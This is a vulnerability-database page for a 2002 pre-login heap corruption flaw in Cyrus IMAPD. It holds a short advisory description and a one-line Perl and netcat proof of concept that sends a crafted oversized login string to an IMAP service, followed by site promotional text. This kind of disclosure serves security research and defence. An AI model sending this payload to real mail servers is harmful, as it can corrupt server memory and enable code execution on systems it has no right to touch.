Lucene search
K

Cyrus IMAPD 1.41.5.192.0.122.0.162.1.92.1.10 - Pre-Login Heap Corruption

🗓️ 02 Dec 2002 00:00:00Reported by Timo SirainenType 
exploitpack
 exploitpack
👁 9 Views

Cyrus IMAPD vulnerable to heap corruption from excessively long login strings, risking code execution.

Code
source: https://www.securityfocus.com/bid/6298/info

Cyrus IMAPD is a freely available, open source Interactive Mail Access Protocol (IMAP) daemon. It is available for Unix and Linux operating systems.

It has been reported that Cyrus IMAPD does not sufficiently handle overly long strings. In some cases, when a user connects to the daemon, and upon negotiating the connection sends a login string of excessive length, a buffer overflow occurs. This could result in heap corruption and arbitrary words in memory being overwritten. It may be possible to exploit this issue to execute arbitrary code.

perl -e 'print "x login {4294967295}\r\n\xf0\xef\xff\xbf\x90\xef\xff\xbf\xfc\xff\xff\xff\xfc\xff\xff\xff";'|nc localhost imap2
<ctrl-c>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Dec 2002 00:00Current
0.6Low risk
Vulners AI Score0.6
9